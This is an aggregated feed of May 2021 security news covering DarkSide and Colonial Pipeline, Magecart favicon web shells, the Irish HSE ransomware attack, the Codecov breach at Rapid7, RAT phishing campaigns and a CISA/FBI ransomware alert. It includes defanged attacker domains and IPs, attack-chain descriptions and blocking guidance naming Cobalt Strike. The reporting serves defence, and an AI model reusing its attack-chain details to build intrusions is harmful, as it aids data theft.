RSS Security

🔒
❌ About FreshRSS
There are new articles available, click to refresh the page.
Before yesterdayGeneral Security News

DarkSide Ransomware Gang Quits After Servers, Bitcoin Stash Seized

14 May 2021 at 15:44

The DarkSide ransomware affiliate program responsible for the six-day outage at Colonial Pipeline this week that led to fuel shortages and price spikes across the country is running for the hills. The crime gang announced it was closing up shop after its servers were seized and someone drained the cryptocurrency from an account the group uses to pay affiliates.

“Servers were seized (country not named), money of advertisers and founders was transferred to an unknown account,” reads a message from a cybercrime forum reposted to the Russian OSINT Telegram channel.

“A few hours ago, we lost access to the public part of our infrastructure,” the message continues, explaining the outage affected its victim shaming blog where stolen data is published from victims who refuse to pay a ransom.

“Hosting support, apart from information ‘at the request of law enforcement agencies,’ does not provide any other information,” the DarkSide admin says. “Also, a few hours after the withdrawal, funds from the payment server (ours and clients’) were withdrawn to an unknown address.”

DarkSide organizers also said they were releasing decryption tools for all of the companies that have been ransomed but which haven’t yet paid.

“After that, you will be free to communicate with them wherever you want in any way you want,” the instructions read.

The DarkSide message includes passages apparently penned by a leader of the REvil ransomware-as-a-service platform. This is interesting because security experts have posited that many of DarkSide’s core members are closely tied to the REvil gang.

The REvil representative said its program was introducing new restrictions on the kinds of organizations that affiliates could hold for ransom, and that henceforth it would be forbidden to attack those in the “social sector” (defined as healthcare and educational institutions) and organizations in the “gov-sector” (state) of any country. Affiliates also will be required to get approval before infecting victims.

The new restrictions came as some Russian cybercrime forums began distancing themselves from ransomware operations altogether. On Thursday, the administrator of the popular Russian forum XSS announced the community would no longer allow discussion threads about ransomware moneymaking programs.

“There’s too much publicity,” the XSS administrator explained. “Ransomware has gathered a critical mass of nonsense, bullshit, hype, and fuss around it. The word ‘ransomware’ has been put on a par with a number of unpleasant phenomena, such as geopolitical tensions, extortion, and government-backed hacks. This word has become dangerous and toxic.”

In a blog post on the DarkSide closure, cyber intelligence firm Intel 471 said it believes all of these actions can be tied directly to the reaction related to the high-profile ransomware attacks covered by the media this week.

“However, a strong caveat should be applied to these developments: it’s likely that these ransomware operators are trying to retreat from the spotlight more than suddenly discovering the error of their ways,” Intel 471 wrote. “A number of the operators will most likely operate in their own closed-knit groups, resurfacing under new names and updated ransomware variants. Additionally, the operators will have to find a new way to ‘wash’ the cryptocurrency they earn from ransoms. Intel 471 has observed that BitMix, a popular cryptocurrency mixing service used by Avaddon, DarkSide and REvil has allegedly ceased operations. Several apparent customers of the service reported they were unable to access BitMix in the last week.”

Magecart gang hides PHP-based web shells in favicons

14 May 2021 at 14:08

Magecart cybercrime gang is using favicon to hide malicious PHP web shells used to maintain remote access to inject JavaScript skimmers into online stores.

Magecart hackers are distributing malicious PHP web shells hidden in website favicon to inject JavaScript e-skimmers into online stores and steal payment information.

Researchers from Malwarebytes observed threat actors, likely Magecart Group 12, using this technique in attacks aimed at online stores running on Magento 1 websites.

The web shells employed in the attacks are tracked as Smilodon or Megalodon, they dynamically load JavaScript skimming code via server-side requests into online stores. This technique allows bypassing most client-side security tools.

“While performing a crawl of Magento 1 websites, we detected a new piece of malware disguised as a favicon. The file named Magento.png attempts to pass itself as ‘image/png’ but does not have the proper PNG format for a valid image file.” reads the analysis published by Malwarebytes.

MAgecart favicon web shells

Threat actors edited the shortcut icon tags with a path to the fake PNG file. Unlike previous incidents observed by the experts that involved the use of fake favicons to hide malicious JavaScript code, in the last wave of attacks the webshell is written in PHP.

In the latest attacks, the e-skimmer code is introduced into the online store dynamically at the server-side.

The web shell retrieves the e-skimmer from a remote host, the code involved in this attack is similar to a variant used in Cardbleed attacks documented by SanSec researchers in September.

The attribution of the attack to Magecart Group 12 is based on overlaps in TTPs observed in the attacks, experts also noticed that the domain name used in the attack (zolo[.]pw) is associated to the same IP address (217.12.204[.]185) as recaptcha-in[.]pw and google-statik[.]pw, domains previously associated with Magecart Group 12.

“There are a number of ways to load skimming code but the most common one is by calling an external JavaScript resource. When a customer visits an online store, their browser will make a request to a domain hosting the skimmer. Although criminals will constantly expand on their infrastructure it is relatively easy to block these skimmers using a domain/IP database approach.” concludes the analysis.

“In comparison, the skimmer we showed in this blog dynamically injects code into the merchant site. The request to the malicious domain hosting the skimming code is not made client-side but server-side instead. As such a database blocking approach would not work here unless all compromised stores were blacklisted, which is a catch-22 situation. A more effective, but also more complex and prone to false positives approach, is to inspect the DOM in real time and detect when malicious code has been loaded.”

Please vote Security Affairs as Best Personal cybersecurity Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Magecart)

The post Magecart gang hides PHP-based web shells in favicons appeared first on Security Affairs.

Report to Your Management with the Definitive 'Incident Response for Management' Presentation Template

14 May 2021 at 13:14
Security incidents occur. It's not a matter of 'if' but of 'when.' There are security products and procedures that were implemented to optimize the IR process, so from the 'security-professional' angle, things are taken care of. However, many security pros who are doing an excellent job in handling incidents find effectively communicating the ongoing process with their management a much more

Pakistan-Linked Hackers Added New Windows Malware to Its Arsenal

14 May 2021 at 12:04
Cybercriminals with suspected ties to Pakistan continue to rely on social engineering as a crucial component of its operations as part of an evolving espionage campaign against Indian targets, according to new research. The attacks have been linked to a group called Transparent Tribe, also known as Operation C-Major, APT36, and Mythic Leopard, which has created fraudulent domains mimicking

Ireland’s Health Service Executive hit by ransomware attack

14 May 2021 at 11:30

Ireland’s Health Service Executive service shut down its IT systems after they were hit with a “significant ransomware attack.”

Another major ransomware attack made the headlines, this time the victim is Ireland’s Health Service Executive that was forced to shut down its IT systems on Friday.

After being targeted with a significant ransomware attack the Health Service Executive opted to shut down its infrastructure as a precaution to avoid the threat from spreading. The good news is that the ongoing coronavirus vaccination campaign was not affected.

“There is a significant ransomware attack on the HSE IT systems. We have taken the precaution of shutting down all our our IT systems in order to protect them from this attack and to allow us fully assess the situation with our own security partners.” reads a statement published by the HSE.” Vaccination appointments are going ahead as normal.”

The authorities launched an investigation into the incident that began at around 4.30am on Friday, the government experts are working to determine the extent of the security breach.

“We’ve taken a precautionary measure to shut down a lot of our major systems to protect them,” chief executive Paul Reid told broadcaster RTE. “We are at the very early stages of fully understanding the threats, the impact and trying to contain it.”

Experts fear that as a result of the ransomware attack there should be cancellations and disruption to services at multiple hospitals in the country.

According to the Associated Press, Dublin’s Rotunda maternity hospital said it was canceling most routine appointments due to the IT issues, calling the situation a “critical emergency.” The attack was classified as fairly sophisticated” by professionals involved in the investigation into the incident. 

Minister for Health Stephen Donnelly declared that the situation was having “a severe impact” on national healthcare services.

“We are working to ensure that the systems and the information is protected. Covid-19 testing and vaccinations are continuing as planned today,” he said.

At the time of this writing the Ireland’s Health Service Executive has yet to receive a ransom demand.

The attack highlighted the importance to protect critical infrastructure from cyber attacks carried out by cybercriminals and nation-state actors.

Please vote Security Affairs as Best Personal cybersecurity Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Ireland Health Service Executive)

The post Ireland’s Health Service Executive hit by ransomware attack appeared first on Security Affairs.

Magecart Hackers Now hide PHP-Based Backdoor In Website Favicons

14 May 2021 at 10:17
Cybercrime groups are distributing malicious PHP web shells disguised as a favicon to maintain remote access to the compromised servers and inject JavaScript skimmers into online shopping platforms with an aim to steal financial information from their users. "These web shells known as Smilodon or Megalodon are used to dynamically load JavaScript skimming code via server-side requests into online

Colonial Pipeline likely paid a $5M ransom to DarkSide

14 May 2021 at 10:13

DarkSide demanded a $5 million ransom to Colonial Pipeline, which has quickly recovered operations, did it pay?

The Colonial Pipeline facility in Pelham, Alabama, was hit by a cybersecurity attack on Friday and its operators were forced to shut down its systems. The pipeline allows carrying 2.5 million barrels of refined gasoline and jet fuel each day up the East Coast from Texas to New York, it covers 45 percent of the East Coast’s fuel supplies.

“The operator of the system, Colonial Pipeline, said in a statement late Friday that it had shut down its 5,500 miles of pipeline, which it says carries 45 percent of the East Coast’s fuel supplies, in an effort to contain the breach on its computer networks. Earlier Friday, there were disruptions along the pipeline, but it was unclear whether that was a direct result of the attack.” reported The New York Times.

Early this week, the U.S. Federal Bureau of Investigation confirmed that the Colonial Pipeline was shut down due to a cyber attack carried out by the Darkside ransomware gang.

The pipeline allows carrying 2.5 million barrels of refined gasoline and jet fuel each day up the East Coast from Texas to New York, it covers 45 percent of the East Coast’s fuel supplies.

Colonial Pipeline has recovered quickly from the ransomware attack, all its infrastructure has been restarted today.

Colonial Pipeline can now report that we have restarted our entire pipeline system and that product delivery has commenced to all markets we serve. https://t.co/kpWNw0UQve pic.twitter.com/9r5hA2CLNn

— Colonial Pipeline (@Colpipe) May 13, 2021

Multiple media, citing people familiar with the matter, reported that the company had initially refused to pay the ransom.

However, the quick restoration of the operations is suspicious and suggests that the operators of the Colonial Pipeline have paid the ransom.

The New York Rime reported that Colonial Pipeline paid the hackers almost $5 million worth of cryptocurrency to receive a decryption key that allowed it to restore the encrypted files. Because the tool was too slow, the company used its backups to restore the systems.

“The operator of a critical fuel pipeline on the East Coast paid extortionists roughly 75 Bitcoin — or nearly $5 million — to recover its stolen data, according to people briefed on the transaction, clearing the way for gas to begin flowing again but complicating President Biden’s efforts to deter future attacks.” reported the NYT.

“Colonial Pipeline made the ransom payment to the hacking group DarkSide after the cybercriminals last week held up the company’s business networks with ransomware, a form of malware that encrypts data until the victim pays, and threatened to release it online.”

According to the media, once the company has obtained the decryption key used it along with its backup system to quickly restore the impacted systems and resume pipeline operations.

Please vote Security Affairs as Best Personal Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Colonial Pipeline)

The post Colonial Pipeline likely paid a $5M ransom to DarkSide appeared first on Security Affairs.

Big Cybersecurity Tips For Remote Workers Who Use Their Own Tech

14 May 2021 at 09:00
As the total number of people working from home has grown dramatically in the last year or two, so has the number of individuals who use all of their own technology for their jobs. If you're a remote worker who relies on your own PC to get your work done, then you may be at a heightened risk for some of the major threats that are impacting the computer industry as a whole. Relatively few people

Colonial Pipeline Paid Nearly $5 Million in Ransom to Cybercriminals

14 May 2021 at 07:57
Colonial Pipeline on Thursday restored operations to its entire pipeline system nearly a week following a ransomware infection targeting its IT systems, forcing it to reportedly shell out nearly $5 million to regain control of its computer networks. "Following this restart, it will take several days for the product delivery supply chain to return to normal," the company said in a statement on

Rapid7 Source Code Breached in Codecov Supply-Chain Attack

14 May 2021 at 07:02
Cybersecurity company Rapid7 on Thursday revealed that unidentified actors improperly managed to get hold of a small portion of its source code repositories in the aftermath of the software supply chain compromise targeting Codecov earlier this year. "A small subset of our source code repositories for internal tooling for our [Managed Detection and Response] service was accessed by an

Rapid7 says source code, credentials accessed as a result of Codecov supply-chain attack

14 May 2021 at 06:19

Rapid7 disclosed that unauthorized third-party had access to source code and customer data as result of Codecov supply chain attack.

Cyber security vendor Rapid7 reveals it was impacted by the Codecov software supply chain attack, attackers had access to data for part of its customers and a small subset of its source code repositories for internal tools.

In April, the software company Codecov disclosed a major security breach after a threat actor compromised its infrastructure to inject a credentials harvester code to one of its tools named Bash Uploader.

The threat actor gained periodic access to the Bash Uploader script making changes to add malicious code. The malicious code would allow the attacker to intercept uploads and scan and collect any sensitive information, including credentials, tokens, or keys.

Code coverage is one of the major metrics companies, it provides code testing solutions to a broad range of organizations, including Atlassian, P&G, GoDaddy, and the Washington Post.

The security breach took place on January 31, but it was discovered on April 1st by one of its customers.

Shortly after the disclosure of the Codecov supply chain attack, the company launched an internal investigation to determine the potential impact on its infrastructure. The experts discovered that:

  • A small subset of our source code repositories for internal tooling for our MDR service was accessed by an unauthorized party outside of Rapid7
  • These repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers
  • No other corporate systems or production environments were accessed, and no unauthorized changes to these repositories were made

The repositories accessed by third-party contained internal credentials and alert-related data for a subset of its MDR (managed detection and response) customers. In response to the breach, the company reset the impacted credentials.

“We will update this notice if we learn new information that changes the scope of the impact described here. If you are a customer and have any questions or need further information, please contact your Account Team or email [email protected]” concludes Rapid7.

Please vote Security Affairs as Best Personal Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, supply chain attack)

The post Rapid7 says source code, credentials accessed as a result of Codecov supply-chain attack appeared first on Security Affairs.

Security at Bay: Critical Infrastructure Under Attack

13 May 2021 at 20:16

The recent Colonial Pipeline attack highlights the dangers that are facing Critical Infrastructure worldwide.

The attack perpetrated by hackers on oil company Colonial Pipeline highlights the dangers that are facing Industrial Control Systems (ICS) and the need for change in the information security landscape,

The attack took place on May 7th where hackers used ransomware to cripple the defense of the company. As a result, all operations were forced to shut down as well as operating systems used by the company. A group named DarkSide claimed to be responsible for Colonial Pipelines attack.

The hacker group is active since august and are part of a professional crime industry that have caused damage of billions of dollars. President Biden has delivery remarks that point out to the involvement of Russia in the development of the ransomware. It is not clear if the Colonial company has paid the demands.

The attack brought to light how critical national infrastructure (CNI) is vulnerable and the need of new methodologies to address new menaces that are evolving on a daily basis on many different ways. As far as we know this attack have proved that the understanding of information security has become outdated as well the solutions that were supposed to protect companies assets.

The impact of the attack was far beyond then expected. Consumers were directely impacted with a hike on prices. Also, in South east some drivers started to stocking up as available oil dropped down in fuel stations. About 5,500 miles of pipeline were shutdown. To figure it out in numbers it represents 45% of fuel comsumed from texas to new york.

As reported by Recorded Future ransomware attack groups are gainning momentum and wide spreading throughout every and all sector. From industry to education everyone is on target of ransomware. It is importante to notice that hackers are publishing part of the data and demanding money to do not publish all the data stolen.

While the United States leads the attack of ransomware hackers are aiming to make other countries victims. Freedom and security are deeply rooted in the american dream, but today all the nation see this rights going down with the dangers of information security.

The US Department of Justice and a group of companies have created a task force to manage the issue of ransomware threat. However, the tools that were released by equation group in the past can be the tipping point to new attacks or development of new ways to bypass known protections.

Little is known yet how the company was breached but it was certanly that the goal was to obtain money instead of corrupting the system. Some parts of the system were restored and the company said it will update their systems. Part of operations are manual at this time but its not sure when the supplies will return to normal.

The question now is if the available supplies will be enough. The disruption of the supplies could lead to an impact on many sectors. Bitdefender released a decryption tool on january for an older version of the ransomware, but they said that for this new version the tool do not work. According to Bloomberg 100GB was stolen in just two hours. This is a remarkable event to be considered as the largest and successful act of cyberwarfare.

Finally we need to develop new systems and new tecnologies as this could be the starting of a surge of new threat actors and new attacks that can not be stopped by the actual protection solutions.  

Sources:

https://therecord.media/ransomware-tracker-threat-groups-focus-on-vulnerable-targets/

https://www.zdnet.com/article/colonial-pipeline-ransomware-attack-everything-you-need-to-know/

https://www.bbc.com/news/business-57081386

https://www.bbc.com/news/business-57050690

https://www.computerweekly.com/news/252500508/Colonial-Pipeline-ransomware-attack-has-grave-consequences

https://www.databreachtoday.com/colonial-pipeline-attack-all-monsters-are-human-a-16568

https://www.cbsnews.com/news/colonial-pipeline-ransomware-attack-darkside-criminal-gang/

https://www.bloomberg.com/news/articles/2021-05-09/colonial-hackers-stole-data-thursday-ahead-of-pipeline-shutdown

Please vote Security Affairs as Best Personal cybersecurity Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

About the author Luis Nakamoto_

Luis Nakamoto is a Computer Science student of Cryptology and an enthusiastic of information security having participated in groups like Comissão Especial de Direito Digital e Compliance (OAB/SP) and CCBS (Consciência Cibernética Brasil) as a researcher in new technologies related to ethical hacking, forensics and reverse
engineering. Also, a prolific and compulsive writer participating as a Redactor to Portal Tic from Sebrae Nacional.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Critical Infrastructure)

The post Security at Bay: Critical Infrastructure Under Attack appeared first on Security Affairs.

Please vote Security Affairs – 1 day left

13 May 2021 at 18:38

Hi Guys
I need your support. I became aware only not that we can nominate SecurityAffairs as Best Personal Blog.

I need your support. Please vote Security Affairs as Best Personal cybersecurity Blog at the following link

https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

The URL is https://securityaffairs.co/

and indicate me Pierluigi Paganini as reference

Thank you!
Pierluigi

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking)

The post Please vote Security Affairs – 1 day left appeared first on Security Affairs.

Organizations in aerospace and travel sectors under attack, Microsoft warns

13 May 2021 at 17:27

Microsoft warns of a malware-based campaign that targeted organizations in the aerospace and travel sectors in the past months.

Microsoft researchers revealed that organizations in the aerospace and travel sectors have been targeted in the past months in a malware-based campaign.

Threat actors conducted a spear-phishing campaign using messages that were specifically designed to be of interest to the targeted organizations. The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. The email uses an image posing as a PDF file that contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads.

In the past few months, Microsoft has been tracking a dynamic campaign targeting the aerospace and travel sectors with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AsyncRAT. pic.twitter.com/aeMfUUoVvf

— Microsoft Security Intelligence (@MsftSecIntel) May 11, 2021

The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads. pic.twitter.com/9r0OTmZQJb

— Microsoft Security Intelligence (@MsftSecIntel) May 11, 2021

The attackers used a new loader dubbed Snip3 which appears under active development and that was recently analyzed by Morphisec researchers that already detected a dozen versions over the last months.

“The first stage of the attack chain is a VB Script that’s designed to load and then move the execution to the second-stage PowerShell script. We’ve identified four versions containing 11 sub-versions in this initial loader stage, with the main difference between the four being the second-stage PowerShell loading mechanism. The main difference between the 11 sub-versions is the type of obfuscation that each uses.” states Morphisec.

The final stage in the attacks observed by Microsoft is common RAT, such as RevengeRAT or AsyncRAT, experts also reported the involvement of additional payloads, including Agent Tesla and NetWire RAT.

Threat actors employed the malware to steal sensitive data from the victims.

The RATs are controlled using C2 server hosted on dynamic hosting sites, they use a UTF-8-encoded PowerShell and fileless techniques to download three additional stages from pastebin[.]com or similar sites.

The Trojans attempt to inject components into processes like RegAsm, InstallUtil, or RevSvcs.

The Trojans continuously re-run components until they are able to inject into processes like RegAsm, InstallUtil, or RevSvcs. They steal credentials, screenshots and webcam data, browser and clipboard data, system and network into, and exfiltrates data often via SMTP Port 587. pic.twitter.com/TKRSPpNujq

— Microsoft Security Intelligence (@MsftSecIntel) May 11, 2021

The final payloads allow attackers to steal credentials, take screenshots and spy through the webcam, then stolen data are exfiltrated via SMTP Port 587.

“Microsoft 365 Defender detects the multiple components of this attack. Our researchers are closely monitoring the campaign and will share additional info and investigation guidance through Microsoft 365 security center and Microsoft Threat Experts.” concludes Microsoft.

Please vote Security Affairs as Best Personal cybersecurity Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft)

The post Organizations in aerospace and travel sectors under attack, Microsoft warns appeared first on Security Affairs.

Cisco fixes AnyConnect Client VPN zero-day disclosed in November

13 May 2021 at 15:53

Cisco has addressed a zero-day in the Cisco AnyConnect Secure Mobility Client VPN software, with publicly available proof-of-concept exploit code.

Cisco has addressed a zero-day vulnerability in Cisco AnyConnect Secure Mobility Client, tracked as CVE-2020-3556, that was disclosed in November. The availability of a proof-of-concept exploit code for the zero-day was confirmed by the Cisco Product Security Incident Response Team (PSIRT) that also added that the company is not aware of threat actors exploiting it in the wild.

The CVE-2020-3556 flaw resided in the interprocess communication (IPC) channel of Cisco AnyConnect Client, it can be exploited by authenticated and local attackers to execute malicious scripts via a targeted user.

“A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client Software could allow an authenticated, local attacker to cause a targeted AnyConnect user to execute a malicious script.” reads the advisory published by the company in November.

“The vulnerability is due to a lack of authentication to the IPC listener. An attacker could exploit this vulnerability by sending crafted IPC messages to the AnyConnect client IPC listener. A successful exploit could allow an attacker to cause the targeted AnyConnect user to execute a script. This script would execute with the privileges of the targeted AnyConnect user.”

It affects all AnyConnect client versions for Windows, Linux, and macOS with vulnerable configurations. The IT giant confirmed that iOS and Android clients are not impacted by this flaw.

“In order to successfully exploit this vulnerability, there must be an ongoing AnyConnect session by the targeted user at the time of the attack. To exploit this vulnerability, the attacker would also need valid user credentials on the system upon which the AnyConnect client is being run.” continues the advisory.

“A vulnerable configuration requires both the Auto Update setting and Enable Scripting setting to be enabled, Auto Update is enabled by default, and Enable Scripting is disabled by default.”

The issue could be exploited in presence of active AnyConnect sessions and valid credentials on the targeted device.

The vulnerability was reported to Cisco by Gerbert Roitburd from Secure Mobile Networking Lab (TU Darmstadt).

Cisco disclosed the zero-day bug tracked as CVE-2020-3556 in November 2020 without releasing security updates but provided mitigation measures to decrease the attack surface.

Now the IT giant fixed the issue with the release of AnyConnect Secure Mobility Client Software 4.10.00093.

Cisco’s advisory reports that:

  • This vulnerability is not exploitable on laptops used by a single user, but instead requires valid logins for multiple users on the end-user device.
  • This vulnerability is not remotely exploitable, as it requires local credentials on the end-user device for the attacker to take action on the local system.
  • This vulnerability is not a privilege elevation exploit. The scripts run at the user level by default. If the local AnyConnect user manually raises the privilege of the User Interface process, the scripts would run at elevated privileges.
  • This vulnerability’s CVSS score is high because, for configurations where the vulnerability is exploitable, it allows one user access to another user’s data and execution space.

In order to mitigate the flaw customers could disable the Auto Update feature or disabling the Enable Scripting configuration setting.

Please vote Security Affairs as Best Personal cybersecurity Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Cisco AnyConnect Secure Mobility Client VPN)

The post Cisco fixes AnyConnect Client VPN zero-day disclosed in November appeared first on Security Affairs.

Biden signed executive order to improve the Nation’s Cybersecurity

13 May 2021 at 12:18

President Joe Biden signed an ambitious executive order to dramatically improve the security of the US government networks.

President Biden signed an executive order this week to improve the country’s defenses against cyberattacks, it is an important move that comes shortly after the recent wave of attacks, such as the SolarWinds supply chain attack and the Colonial Pipeline attack.

“The United States faces persistent and increasingly sophisticated malicious cyber campaigns that threaten the public sector, the private sector, and ultimately the American people’s security and privacy.  The Federal Government must improve its efforts to identify, deter, protect against, detect, and respond to these actions and actors.” reads the 34-page document.

The document titled Executive Order on Improving the Nation’s Cybersecurity aims at modernize the cybersecurity defenses to make the federal government’s infrastructure resilient to increasly sophisticated attacks.

The order proposes a standardized Federal Government’s Playbook for responding to cybersecurity vulnerabilities and incidents, it also aims at improving the sharing of information related to threats and threat actors.

The order requires IT (information technology) and OT (operational technology) service providers to share information about cybersecurity threats and incidents.

The order assigned to the Secretary of Homeland Security, in consultation with the Attorney General, the responsibility of establishing the Cyber Safety Review Board (Board) which will review and assess cybersecurity.

“The Board’s membership shall include Federal officials and representatives from private-sector entities.  The Board shall comprise representatives of the Department of Defense, the Department of Justice, CISA, the NSA, and the FBI, as well as representatives from appropriate private-sector cybersecurity or software suppliers as determined by the Secretary of Homeland Security.” continues the order. “A representative from OMB shall participate in Board activities when an incident under review involves FCEB Information Systems, as determined by the Secretary of Homeland Security.  The Secretary of Homeland Security may invite the participation of others on a case-by-case basis depending on the nature of the incident under review. “

Federal agencies are requested to implement a Zero Trust Architecture, implement multi-factor authentication, and adopt encryption for data at rest and in transit.

The order urges to Improve the security of the software supply-chain by developing guidelines, tools, and adopting best practices to audit critical software components.

“The security of software used by the Federal Government is vital to the Federal Government’s ability to perform its critical functions.” states the order. “Accordingly, the Federal Government must take action to rapidly improve the security and integrity of the software supply chain, with a priority on addressing critical software.”

The measures have to assure that software is not tampered with by threat actors and have to be resilient to supply-chain attacks.

The order also urges the deployment of a centralized Endpoint Detection and Response (EDR) solution and intra-governmental information sharing for early detection of any compromise and attack.

The actions listed in the order have to be conducted in a period of time that ranges between 30 days up to 360 days.

The White House has also released a FACT SHEET related to the executive order that provides a summary of its content.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, executive order)

The post Biden signed executive order to improve the Nation’s Cybersecurity appeared first on Security Affairs.

Can Data Protection Systems Prevent Data At Rest Leakage?

13 May 2021 at 11:47
Protection against insider risks works when the process involves controlling the data transfer channels or examining data sources. One approach involves preventing USB flash drives from being copied or sending them over email. The second one concerns preventing leakage or fraud in which an insider accesses files or databases with harmful intentions. What's the best way to protect your data? It

Dark Web Getting Loaded With Bogus Covid-19 Vaccines and Forged Cards

13 May 2021 at 10:54
Bogus COVID-19 test results, fraudulent vaccination cards, and questionable vaccines are emerging a hot commodity on the dark web in what's the latest in a long list of cybercrimes capitalizing on the coronavirus pandemic. "A new and troubling phenomenon is that consumers are buying COVID-19 vaccines on the black market due to the increased demand around the world," said Anne An, a senior

US CISA and FBI publish joint alert on DarkSide ransomware

13 May 2021 at 09:17

FBI and DHS’s CISA have published a joint alert on DarkSide ransomware activity after the disruptive attack on Colonial Pipeline.

FBI and DHS’s CISA have published a joint alert to warn of ransomware attacks conducted by the DarkSide group. The alert comes after the disruptive attack that hit Colonial Pipeline that caused chaos and disruption.

The Darkside ransomware gang first emerged in the threat landscape in August 2020, in recent months the group was very active and targeted organizations worldwide.

Early this year the group announced that it will no longer attack organizations in the healthcare industry, companies involved in the development and distribution of COVID-19 vaccines, and funeral service organizations.

The alert provides technical details and mitigations related to the activity of Darkside ransomware gang. The group provides Ransomware-as-a-Service (RaaS) to a network of affiliates.

“DarkSide is ransomware-as-a-service (RaaS)—the developers of the ransomware receive a share of the proceeds from the cybercriminal actors who deploy it, known as “affiliates.” According to open-source reporting, since August 2020, DarkSide actors have been targeting multiple large, high-revenue organizations, resulting in the encryption and theft of sensitive data. The DarkSide group has publicly stated that they prefer to target organizations that can afford to pay large ransoms instead of hospitals, schools, non-profits, and governments.[3],[4]” reads the joint alert.

“According to open-source reporting, DarkSide actors have previously been observed gaining initial access through phishing and exploiting remotely accessible accounts and systems and Virtual Desktop Infrastructure (VDI) (Phishing [T1566], Exploit Public-Facing Application [T1190], External Remote Services [T1133]).[5],[6] DarkSide actors have also been observed using Remote Desktop Protocol (RDP) to maintain Persistence [TA0003].[7].”

The alert confirmed that crooks use DarkSide to gain access to a victim’s network to encrypt files on internal systems and exfiltrate data, then threaten to expose data if the victim refuses to pay the ransom.

US agencies warn that groups employed DarkSide ransomware in attacks aimed at organizations across various Critical Infrastructure sectors, including manufacturing, legal, insurance, healthcare, and energy.

Immediately after the attack on Colonial Pipeline, the DarkSide group pointed out that it is financially motivated and that there is no political motivation behind its intrusion.

“Our goal is to make money, and not creating problems for society,” reads a statement from the group.

The FBI/CISA joint alert includes mitigations for ransomware attacks: 

  • Require multi-factor authentication for remote access to OT and IT networks.
  • Enable strong spam filters to prevent phishing emails from reaching end users. Filter emails containing executable files from reaching end users.
  • Implement a user training program and simulated attacks for spearphishing to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails.
  • Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses. Prevent users from accessing malicious websites by implementing URL blocklists and/or allowlists.
  • Update software, including operating systems, applications, and firmware on IT network assets, in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program.
  • Limit access to resources over networks, especially by restricting RDP. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require multi-factor authentication.
  • Set antivirus/antimalware programs to conduct regular scans of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.
  • Implement unauthorized execution prevention by
    • Disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
    • Implementing application allowlisting, which only allows systems to execute programs known and permitted by security policy. Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers or compression/decompression programs, including the AppData/LocalAppData folder.
    • Monitor and/or block inbound connections from Tor exit nodes and other anonymization services to IP addresses and ports for which external connections are not expected (i.e., other than VPN gateways, mail ports, web ports). For more guidance, refer to Joint Cybersecurity Advisory AA20-183A: Defending Against Malicious Cyber Activity Originating from Tor.
    • Deploy signatures to detect and/or block inbound connection from Cobalt Strike servers and other post exploitation tools.

CISA and FBI urge CI owners and operators to apply the following mitigations now to reduce the risk of severe business or functional degradation should their CI entity fall victim to a ransomware attack in the future.

  • Implement and ensure robust network segmentation between IT and OT networks.
  • Organize OT assets into logical zones.
  • Identify OT and IT network inter-dependencies and develop workarounds or manual controls. 
  • Regularly test manual controls.
  • Implement regular data backup procedures 

“CISA and the FBI do not encourage paying a ransom to criminal actors,” concludes the alert. “Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or may fund illicit activities. Paying the ransom also does not guarantee that a victim’s files will be recovered.”

Please vote Security Affairs as Best Personal cybersecurity Blog
